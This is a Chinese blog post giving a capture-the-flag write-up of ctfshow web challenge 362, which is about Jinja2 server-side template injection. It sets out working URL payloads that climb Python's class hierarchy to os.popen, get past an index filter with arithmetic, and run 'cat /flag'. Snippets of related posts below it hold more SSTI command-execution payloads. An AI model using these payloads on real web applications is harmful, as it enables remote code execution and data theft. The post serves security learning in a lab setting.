SSTI模板注入-ctfshow web入门362

最新推荐文章于 2024-04-08 10:49:31 发布
最新推荐文章于 2024-04-08 10:49:31 发布
阅读量265 收藏 1
点赞数
分类专栏: SSTI模板注入 CTFShow 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52635170/article/details/129591188
版权

ctfshow web入门362

如果大家对于SSTI漏洞不太清楚的话,可以访问我之前的文章SSTI模板注入,该文章里也包含了ctfshow web入门361的write up。

1、测试是否含有SSTI模板注入漏洞

老样子将url中name参数值改为name={{7*7}},观察页面输出是否为49。
在这里插入图片描述
返现页面输出49,该站点存在SSTI模板注入漏洞。

2、获得内置类所对应的类
http://f22a9be4-d9b2-492e-b7b0-6d0d29106115.challenge.ctf.show/?name={{''.__class__}}

在这里插入图片描述

3、获得object基类
http://f22a9be4-d9b2-492e-b7b0-6d0d29106115.challenge.ctf.show/?name={{''.__class__.__base__}}

在这里插入图片描述

4、获得所有子类
http://f22a9be4-d9b2-492e-b7b0-6d0d29106115.challenge.ctf.show/?name={{''.__class__.__base__.__subclasses__()}}

在这里插入图片描述

5、获得可以执行shell命令的子类

我们还是以popen方法为例,在ctfshow web入门361中我们已经找到包含popen的方法的类为os._wrap_close,且其索引值为132。这次我们还是使用这个类。

http://f22a9be4-d9b2-492e-b7b0-6d0d29106115.challenge.ctf.show/?name={{''.__class__.__base__.__subclasses__()[132]}}

在这里插入图片描述
但是我们在获取过程中发现好像什么东西被过滤了。
我们访问索引值为其他数字的类试一下,看是否全被过滤了。
在这里插入图片描述
我们发现,索引值为110的类并没有被过滤,说明该网站只是过滤部分类的索引值,我们尝试使用-1的操作看是否能够获得。
在这里插入图片描述
成功访问到了os._wrap_close类。

6、获取可以执行shell命令的方法
http://f22a9be4-d9b2-492e-b7b0-6d0d29106115.challenge.ctf.show/?name={{''.__class__.__base__.__subclasses__()[140-1-1-1-1-1-1-1-1].__init__.__globals__['popen']}}

在这里插入图片描述

7、执行shell命令获取flag
http://f22a9be4-d9b2-492e-b7b0-6d0d29106115.challenge.ctf.show/?name={{''.__class__.__base__.__subclasses__()[140-1-1-1-1-1-1-1-1].__init__.__globals__['popen']('cat /flag').read()}}

在这里插入图片描述

其他方法

我们使用config以及lipsum也是可以获得os模块,从而使用popen方法,达到执行shell命令的效果。

原理
lipsum.__globals__ 中包含os模块
config.__init__.__globals__ 中也包含os模块
效果
http://f22a9be4-d9b2-492e-b7b0-6d0d29106115.challenge.ctf.show/?name={{lipsum.__globals__.os.popen('cat /flag').read()}}

在这里插入图片描述

http://f22a9be4-d9b2-492e-b7b0-6d0d29106115.challenge.ctf.show/?name={{config.__init__.__globals__.os.popen('cat /flag').read()}}

在这里插入图片描述
成功拿到flag!

你们de4月天
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ctfshow-ssti
m0_74456293的博客
03-09 330
ctfshow-ssti
CTFSHOW、SSTI模块
RealIiikun的博客
03-10 324
ctfshow_ssti模块
ctf_show笔记篇(web入门---SSTI
最新发布
whale_waves的博客
04-08 951
模板引擎是为了让用户界面以及业务数据分离开才产生的,模板引擎会生成特定的文档,然后通过模板引擎生成前端html代码,然后再获取用户数据再放到渲染函数里渲染,最后将生成的html代码个渲染好的数据结合拿给浏览器呈现给用户。
Ctfshow web入门 SSTI 模板注入web361-web372 详细题解 全
Jay17的博客
08-10 1289
Ctfshow web入门 SSTI 模板注入web361-web372 详细题解 全
ctfshow--SSTI
qq_51684648的博客
03-15 578
ctfshow–SSTI 361、 {{7*‘7’}}回显是7777777,判断是jinjia2模板。 {{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read()}} ''.__class__.mro__[1].__subclasses__()查看object下的所有子类集合。 362、 在__builtin__中有众多的可用函数,包括eval 1: ?name={{ur
[Web安全学习] SSTL模板注入总结
Y1seco的博客
08-18 1355
前置知识 引自 bfengj __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合,Each class keeps a list of w
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
模板注入与_FLASK.pdf
01-02
模板注入,全称为Server Side Template Injection,是一种常见的Web应用程序安全漏洞,它允许攻击者将恶意输入作为模板字符串的一部分,从而在服务端的模板引擎解析时执行函数调用或命令,可能导致敏感信息泄露、...
ctfshow-SSTI
ing_end的博客
05-07 658
SSTI web361 payload: ?name={{ config.__class__.__init__.__globals__['os'].popen('ls').read() }} ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }} 之后打开 ?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag
ctfshow SSTI
m0_74940843的博客
11-08 58
GET输入?说明注入点是?name获得内置类所对应的类获得object基类获得所有子类我们用python脚本观察是否含有’popen’列出根目录内容取得flag。
ctfshow web入门ssti
m0_74092885的博客
11-12 134
也可以将其中的request.args改为request.values,POST和GET两种方法传递的数据request.values都可以接收。我们执行一下whoami的命令,这里一定要记得用.read()来读取一下,因为popen方法返回的是一个file对象。由题目提示,“名字就是考点”,可以猜测,改题目url的参数名应为name,输入name=world测试一下。我们一般常用的是os._wrap_close子类,因为该类具有popen方法,该方法可以执行系统命令。Cookie传参:x=tac /f*
SSTI练习 web361--web372
qing_chuan_的博客
06-15 193
我一步一步试了试,过滤了几个数字2,3等,正好把我可用的os模块没法用了,上网看了好多大佬们的wp可以用全角数字来代替正常数字。这里要提醒我自己一下,这里到用到use_for,自己在哪里拼了半天就是不对。要寄漏,原来过了单双引号啊,当然要用老方法了,request拼接。用subprocess.Popen(),也不行。这题开始过滤了,过了啥,上一题大佬的脚本仍然可以用。哈哈哈,终于到了{}了,直接{%%}+print。加了args过滤,用cookie就好了。上一题全角数字的不能用了。
ctfshow web入门 SSTI
2301_79442654的博客
03-16 180
返回一个包含Python中所有类的列表,这些类都是直接或间接从。选择了列表中的第133个元素(因为索引是从0开始的)。属性,可以获得一个字典,其中包含。类的基类列表,其中第一个元素是。命令,这个命令通常用于读取名为。类定义时可用的所有全局变量。从全局变量字典中获取名为。提示“名字就是考点”
ctfshow web入门SSTI
m0_62422842的博客
06-18 1329
ctfshow的web入门ssti题目的总结
CTFSHOW SSTI
m0_64180167的博客
09-30 218
这里可以使用自定义的变量来绕过 request.values.a 类似于自己定义的变量只需要在}}后面传递参数即可这里是我们需要跑的脚本类型我们需要找到popen来执行命令 我们就可以通过遍历类 然后通过__getitem__找到方法request然后来查询popen写个脚本name="print(i)else:continue跑出来132。
ssti模板注入payload
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

你们de4月天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值